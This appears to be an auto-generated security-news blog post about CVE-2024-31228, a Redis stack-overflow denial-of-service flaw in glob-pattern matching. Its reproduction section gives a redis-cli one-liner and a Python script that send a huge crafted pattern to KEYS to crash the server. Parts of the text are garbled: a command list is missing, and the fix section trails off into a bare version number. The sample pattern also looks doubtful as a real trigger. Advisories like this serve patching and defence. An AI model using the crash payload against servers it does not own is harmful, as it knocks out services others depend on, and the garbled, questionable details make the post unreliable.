CVE CyberSecurity Database News

CVE-2024-31228 - Redis Stack Overflow Exploit—How a Simple Pattern Can Crash Your Database

Poster -

Redis powers countless apps with its blazing speed and simplicity. But sometimes, the simplest parts of a system can be its undoing. That’s exactly what happened with CVE-2024-31228, a vulnerability that lets authenticated users crash Redis using nothing more than an evil search pattern. Let’s break down exactly how this denial-of-service (DoS) bug works, how you can check for it, and what to do now.

What Is CVE-2024-31228?

Redis is an open source, in-memory database. You get super-fast access and a host of convenient commands for storing, searching, and managing data. But starting in early 2024, security researchers discovered a flaw:

- Vulnerable commands like KEYS, SCAN, PSUBSCRIBE, FUNCTION LIST, COMMAND LIST, and some ACL (Access Control List) definitions all *support string matching patterns*.
- If an *authenticated user* supplies a specially crafted, extremely long search pattern, Redis will get stuck recursively matching it.
- This recursion can blow the stack (stack overflow), causing the whole Redis process to crash.

This means any user—if they’re logged in and know what they’re doing—can *brick* your Redis instance until it restarts.

How the Bug Works

The core of this bug is how Redis handles complex string-matching operations. Let’s look at the commands:

ACL pattern definitions for user permissions.

If a user uses a complex and deeply nested pattern, Redis’s matching logic starts to call itself in a recursive loop. Given a long-enough or complex-enough pattern, this results in *unbounded recursion*—and eventually a crash due to stack overflow.

Reproducing the Crash: Example Exploit

WARNING: The following details are for educational purposes only.

Suppose you have access to a vulnerable Redis server (versions before 6.2.16, 7.2.6, or 7.4.1).

Try the following Redis CLI command

redis-cli KEYS $'['$(printf 'a%.s' {1..100000})']'

This sends a matching pattern with 100,000 'a' characters inside some brackets. The large pattern triggers a deep call stack when Redis tries to match it against database keys. Very quickly, Redis will crash with a stack overflow.

Python version

import redis

client = redis.StrictRedis(host='localhost', port=6379, password='yourpassword')

long_pattern = '[' + 'a'*100000 + ']'

# Attempting to use this pattern in KEYS command
print(client.keys(long_pattern))

*Redis should crash if it is vulnerable.*

Note: You need to be authenticated (if requirepass is set) for the exploit to work.

What Makes This Impactful?

- No workaround: You can’t firewall or disable the matching functions. If you use these Redis versions, and let users connect with authenticated access, they can crash your server.

Easy to trigger: Only requires access and a simple, crafted pattern string.

- Denial-of-Service: Not remote code execution, but it’s still a big deal if your services rely on a stable Redis instance.

How Was It Fixed?

Redis maintainers patched the bug by limiting the recursion depth and putting sanity checks in the pattern-matching routines.

7.4.1

If you’re on any earlier version—upgrade ASAP.

Official References

- Redis Security Advisory (CVE-2024-31228)
- GitHub Redis Issue #13037
- CVE Details Entry
- Upstream Patch

Conclusion

CVE-2024-31228 may seem like an esoteric bug, but it reminds us how even basic string-matching can take down world-class software like Redis. Keep your software up to date! And as always, keep a close eye on what your users are allowed to do.

Stay safe, and upgrade your Redis!

*Original post written in plain, clear language for busy developers and sysadmins. Exclusive content crafted for understandable, practical advice.*

Timeline

Published on: 10/07/2024 20:15:05 UTC
Last modified on: 10/10/2024 12:57:21 UTC